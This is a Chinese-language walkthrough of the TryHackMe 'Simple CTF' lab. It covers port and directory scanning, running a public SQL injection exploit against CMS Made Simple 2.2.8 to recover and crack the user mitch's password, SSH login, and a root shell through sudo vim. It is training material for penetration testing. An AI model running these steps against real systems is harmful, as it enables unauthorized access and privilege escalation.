Simple CTF
来自tryhackme的Simple CTF
IP:10.10.27.234
信息收集
端口扫描
nmap -sV -T4 10.10.27.234
可以看到三个端口
21/tcp 打开 ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open ssh OpenSSH 7.2 p2 Ubuntu 4ubuntu2.8(Ubuntu Linux;协议 2.0)
目录扫描
gobuster dir -u 10.10.27.234 -w /usr/share/wordlists/dirb/common.txt
得到
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
/simple (Status: 301)
进入robots.txt,没啥用
可以看到一个cms 并且版本是2.2.8
https://www.exploit-db.com/ 查找可用cve
搜索cms simple 2.2
有一个sqli:https://www.exploit-db.com/exploits/46635
下载到本地利用
根据提示利用字典(但是我本地的路径和提示不同) /usr/share/wordlists/SecLists/Passwords/Common-Credentials/best110.txt
这里因为模块无所以参考 :python2.7 -m pip install termcolor,然后就可以了
python2 46635.py -u http://10.10.27.234/simple --crack -w /usr/share/wordlists/SecLists/Passwords/Common-Credentials/best110.txt
[+] 盐找到密码:1dac0d92e9fa6bb2
[+] 找到用户名:mitch
[+] 找到电子邮件:admin@admin.com
[+] 找到密码:0c01f4468bd75d7a84c7eb73846e8d96
[+] 破解密码:secret
ssh登录,记住端口
ssh mitch@10.10.27.234 -p 2222
然后提权
sudo -l
有vim
sudo vim root
然后直接键入:!sh 回车键
即可root